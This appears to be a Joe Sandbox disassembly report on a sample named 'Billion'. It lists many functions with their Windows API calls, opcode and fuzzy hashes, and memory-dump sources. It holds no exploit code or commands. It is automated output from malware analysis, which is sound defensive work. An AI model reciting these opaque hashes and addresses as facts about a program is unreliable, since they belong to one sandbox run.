                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1ae4658286d2afaa704dc8853e674bf09b15c8cc2860ba61a59f1dabcda9fd95
                                                                                                                                                                                                                                                                                                          • Instruction ID: 712686302e911a6b65bd9056f2a516d534c38a6beb93939ff0c08514dd282e2e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ae4658286d2afaa704dc8853e674bf09b15c8cc2860ba61a59f1dabcda9fd95
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7651E2A061C7D53EFF3642349D95BBABEA95F06708F088489E1D5468D2C3E8EDC4D750
                                                                                                                                                                                                                                                                                                          Function 0019B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetParent.USER32(00000000), ref: 0019B6E0
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0019B6F5
                                                                                                                                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0019B756
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0019B782
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0019B79F
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0019B7DE
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0019B7FF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: dccf32c475b6d6780a9feb5da8da21fdd329f1e8c3aff166a98dd10aad8fad8d
                                                                                                                                                                                                                                                                                                          • Instruction ID: b237568513bb12565ed1efa08b9c6070063bd3a4f0b7059c343e5c168d2cf1ab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dccf32c475b6d6780a9feb5da8da21fdd329f1e8c3aff166a98dd10aad8fad8d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E35123A090C3D53EFF368374DD95BBABEA96B46300F0C8589E0D94A8D2D394EC94D750
                                                                                                                                                                                                                                                                                                          Function 001657A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00165F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 001657E3
                                                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0016585E
                                                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00165879
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0016589F
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,00165F16,00000000,?,?,?,?,?,?,?,?,?,00165F16,?), ref: 001658BE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00165F16,00000000,?,?,?,?,?,?,?,?,?,00165F16,?), ref: 001658F7
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3092846aef1425fe9c71965cb008c6d040275b104c2c72a2fb5e7b46160e33db
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2f2814879d98b28427cd672038e7131ae6b03e8074dee6d141522e2f668df2de
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3092846aef1425fe9c71965cb008c6d040275b104c2c72a2fb5e7b46160e33db
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD51A171A00649DFDB10CFA8DC85AEEBBF9EF09310F14411AE955E7291D730DA61CB61
                                                                                                                                                                                                                                                                                                          Function 001623C1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                                                          • String ID: `
                                                                                                                                                                                                                                                                                                          • API String ID: 269201875-609909085
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5283a3ea633ac4d3a4888a9aaa0f736f7f9f925e053fedb40e6ae30cbf6a1491
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9e6a4e10652935a6ed0003ce653cd48c3334778bca371db04b936e92f33f1db2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5283a3ea633ac4d3a4888a9aaa0f736f7f9f925e053fedb40e6ae30cbf6a1491
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E41B132A00A109FDB24DFB8CC81A6DB7E6EF89314F1545A9E915EB391DB31ED11CB81
                                                                                                                                                                                                                                                                                                          Function 00153090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 001530BB
                                                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 001530C3
                                                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00153151
                                                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0015317C
                                                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 001531D1
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                          • Opcode ID: 19a4548b4d13da6ffb2958abbf2767af812c4f6ba5638d45f742f52038965e02
                                                                                                                                                                                                                                                                                                          • Instruction ID: 903794f3d84cd3c85e5ae69550339a7e7841c4e5c40edc3a4b106c5235dae6a3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19a4548b4d13da6ffb2958abbf2767af812c4f6ba5638d45f742f52038965e02
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3419234A00208EBCF10DF68C885AAEBBB5AF44396F148155EC35AF392D731DB09CB91
                                                                                                                                                                                                                                                                                                          Function 001B1B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001B3AD7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3AAB: _wcslen.LIBCMT ref: 001B3AF8
                                                                                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001B1B6F
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B1B7E
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B1C26
                                                                                                                                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 001B1C56
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c0e0cfcb961a393ee70d88ac71651ae2825cb02be71f41efc50e56634f16a2e9
                                                                                                                                                                                                                                                                                                          • Instruction ID: b179d19a4fad7f9e93fb55e447e189d8b54146ac4f25fd54ef95aaef8c17dc66
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0e0cfcb961a393ee70d88ac71651ae2825cb02be71f41efc50e56634f16a2e9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A411571600604AFDB109F24C985FEABBE9EF45324F558069F8059B292DB70ED81CBE0
                                                                                                                                                                                                                                                                                                          Function 0019D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0019D7CD,?), ref: 0019E714
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0019D7CD,?), ref: 0019E72D
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0019D7F0
                                                                                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0019D82A
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019D8B0
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019D8C6
                                                                                                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?), ref: 0019D90C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                                                                                          • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2e89f4d2f3ea5f671598ff359cbd2c41d065e5fbdb03dd55c5d00ca7f3e5ff47
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4e1d9bed14f1bfe63063ba2496b979e36abb659b606b68b8c3b34379d6cdd28d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e89f4d2f3ea5f671598ff359cbd2c41d065e5fbdb03dd55c5d00ca7f3e5ff47
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B4162719052189EDF12EFA4D981EDE77B8AF18340F5004EAE609EB152EB34A788CB50
                                                                                                                                                                                                                                                                                                          Function 001A42B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetInputState.USER32 ref: 001A4310
                                                                                                                                                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 001A4367
                                                                                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 001A4390
                                                                                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 001A439A
                                                                                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001A43AB
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2256411358-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6cff617ce73d81ae33782c41b1ea05ca21ce9c9e0553f5101e2ae7265ac3210d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 747d0085d3477110e4437732a0d04cbbee7951ee3af34e59d0c66b71e2a9da9f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cff617ce73d81ae33782c41b1ea05ca21ce9c9e0553f5101e2ae7265ac3210d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3531A474904355DFEF38CB74E84DBB67BA8BF92304F14456AD4A2821A1E3F49489CB21
                                                                                                                                                                                                                                                                                                          Function 001C3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001C38B8
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C38EB
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C3920
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001C3952
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001C397C
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C398D
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001C39A7
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e425c8fc2259d0ce594cfae812cb048193e6da9338bdcdd1421143b82aeb1c56
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5eac1a2629f93a4d3306488bdcaea155a4b0b20cbcacc5957abcd1acc3e473af
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e425c8fc2259d0ce594cfae812cb048193e6da9338bdcdd1421143b82aeb1c56
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2311530704255EFDB21CF48EC89F6837A5FB9A718F1552A9F5208B2B2CB71E985DB01
                                                                                                                                                                                                                                                                                                          Function 0019808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001980D0
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001980F6
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 001980F9
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00198117
                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00198120
                                                                                                                                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00198145
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00198153
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9d478ee52bce65d9bd431a541bbb482fef5217269ff1d64cc8021e899cb7314b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 79252ffd3b9987bc2c67716c7797e15c322dd1424581f4d21538c39c7a2691fa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d478ee52bce65d9bd431a541bbb482fef5217269ff1d64cc8021e899cb7314b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F217176600219AFDF14DFA8DC88CBB77ACEB0A3647048535FA15DB290DB74ED868760
                                                                                                                                                                                                                                                                                                          Function 00198164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001981A9
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001981CF
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 001981D2
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 001981F3
                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 001981FC
                                                                                                                                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00198216
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00198224
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a1db4fa03ff62af04bd206e1b445884f0ef48f357b940fa25b2edd596c8a915e
                                                                                                                                                                                                                                                                                                          • Instruction ID: f6432c456f9dbac1959d4e05de3cf1f432d3cd16a5eac38c09c3b671c826cdb3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1db4fa03ff62af04bd206e1b445884f0ef48f357b940fa25b2edd596c8a915e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69215675604504BF9F14DFA8EC89DAA77ECEB0A3607048135F915CB1A1DB70EC82C764
                                                                                                                                                                                                                                                                                                          Function 001A0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 001A0E99
                                                                                                                                                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001A0ED5
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
